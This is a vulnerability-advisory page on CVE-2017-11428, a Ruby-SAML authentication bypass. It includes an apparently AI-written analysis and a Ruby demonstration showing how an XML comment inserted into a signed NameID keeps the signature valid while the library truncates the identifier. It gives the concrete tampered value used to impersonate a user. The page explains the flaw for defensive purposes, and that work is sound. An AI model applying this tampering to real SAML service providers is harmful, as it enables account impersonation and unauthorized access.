VYPR
High severity · NVD Advisory · Published Apr 17, 2019 · Updated Aug 5, 2024

Multiple SAML libraries may allow authentication bypass via incorrect XML canonicalization and DOM traversal

CVE-2017-11428

Description

OneLogin Ruby-SAML 1.6.0 and earlier may incorrectly utilize the results of XML DOM traversal and canonicalization APIs in such a way that an attacker may be able to manipulate the SAML data without invalidating the cryptographic signature, allowing the attack to potentially bypass authentication to SAML service providers.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Ruby-SAML before 1.7.0 mishandles XML DOM traversal and canonicalization, allowing attackers to modify SAML data without breaking the signature, potentially bypassing authentication.

Root Cause

The vulnerability arises from incorrect use of XML DOM traversal and canonicalization APIs in OneLogin Ruby-SAML versions 1.6.0 and earlier. The two APIs treat comments inside an element differently: the canonicalization used to verify the XML Signature (exclusive C14N without comments) discards comment nodes, so a comment inserted into a signed value does not change the canonical form and the signature still verifies, while the DOM accessor the library uses to read the element's text returns only the text node that precedes the comment. The signed data is therefore intact, but the value the service provider acts on is truncated at the comment [1] [3].

Exploitation

An attacker who holds an account at the identity provider obtains a legitimately signed assertion for that account and inserts an XML comment into the NameID (or another identifying value), for example splitting user@example.com.evil.com into user@example.com<!---->.evil.com. The signature remains valid because the comment is removed during canonicalization, but the vulnerable service provider reads only user@example.com and treats the attacker as that user. The tampering is performed remotely on the SAML response in transit to the service provider; it requires an IdP account whose identifier the attacker can shape, not a compromised IdP or SP [2] [3].
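The comment-splitting behaviour described in the Root Cause and Exploitation sections, as an added Ruby example (not code from the ruby-saml gem or from the original advisory). It uses the standard-library REXML parser that ruby-saml relies on for DOM access, a constructed assertion fragment, and a simplified stand-in for comment-dropping canonicalization; the identifiers user@example.com and user@example.com.evil.com are assumed for illustration only.

```ruby
require 'rexml/document'
require 'digest'

NAMEID_XPATH = '//*[local-name()="NameID"]'

# Constructed sample values (not from a real IdP). The attacker is assumed to
# hold an IdP account whose identifier is "user@example.com.evil.com" and to
# be targeting the legitimate user "user@example.com".
LEGIT_NAMEID    = 'user@example.com.evil.com'
TAMPERED_NAMEID = 'user@example.com<!---->.evil.com'
VICTIM          = 'user@example.com'

# Minimal assertion fragment wrapping the NameID (constructed sample).
def assertion_for(name_id)
  <<~XML
    <saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
      <saml:Subject><saml:NameID>#{name_id}</saml:NameID></saml:Subject>
    </saml:Assertion>
  XML
end

def name_id_element(xml)
  REXML::XPath.first(REXML::Document.new(xml), NAMEID_XPATH)
end

# Vulnerable pattern: REXML::Element#text returns only the first Text child,
# so everything after an embedded comment is silently dropped.
def vulnerable_name_id(xml)
  name_id_element(xml).text
end

# Hardened pattern: concatenate every Text child. Comment nodes are not Text
# nodes, so they are skipped and the full value that was signed is returned.
def hardened_name_id(xml)
  name_id_element(xml).texts.map(&:value).join
end

# Stand-in for the digest a signature verifier computes over the canonical
# form. Exclusive C14N without comments discards comment nodes; this helper
# performs only that step (assumption: a simplified model, not a full C14N
# implementation) and hashes the result.
def digest_without_comments(xml)
  doc = REXML::Document.new(xml)
  doc.each_recursive do |element|
    element.children.select { |c| c.is_a?(REXML::Comment) }.each(&:remove)
  end
  canonical = +''
  doc.write(canonical)
  Digest::SHA256.hexdigest(canonical)
end

# Ties the pieces together: the tampered assertion hashes identically to the
# legitimate one (the signature check passes) yet the vulnerable reader
# yields the victim's identifier.
def demo
  legit    = assertion_for(LEGIT_NAMEID)
  tampered = assertion_for(TAMPERED_NAMEID)
  {
    signature_check_passes: digest_without_comments(legit) == digest_without_comments(tampered),
    vulnerable_sees:        vulnerable_name_id(tampered),
    hardened_sees:          hardened_name_id(tampered)
  }
end

if $PROGRAM_NAME == __FILE__
  demo.each { |k, v| puts "#{k}: #{v}" }
end
```

Run it as a script: the digest of the legitimate and the tampered fragment is identical, the vulnerable accessor returns user@example.com, and the hardened accessor returns the full user@example.com.evil.com. Any service provider that reads identifiers with a first-text-node accessor while the signature is verified over a comment-free canonical form shows the same gap; reading all text nodes (or rejecting elements that contain comments) closes it.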

Impact

Successful exploitation lets a remote attacker holding a low-privilege identity-provider account impersonate another user at the service provider, for instance by choosing an identifier that truncates to the victim's NameID once the comment is inserted, and so bypass authentication to SAML service providers. This can lead to unauthorized access to applications and systems relying on the affected Ruby-SAML library [1] [3].

Mitigation

The issue is fixed in Ruby-SAML version 1.7.0 and later. Organizations using affected versions should update immediately. The same class of vulnerability also affects other SAML libraries (python-saml, saml2-js, OmniAuth-SAML, Shibboleth OpenSAML, and Wizkunde SAMLBase) [3]. No library-level workaround is available; applying the patch is the remediation.

AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package     Ecosystem   Affected versions   Patched versions
ruby-saml   RubyGems    < 1.7.0             1.7.0

Affected products: 2


References: 4
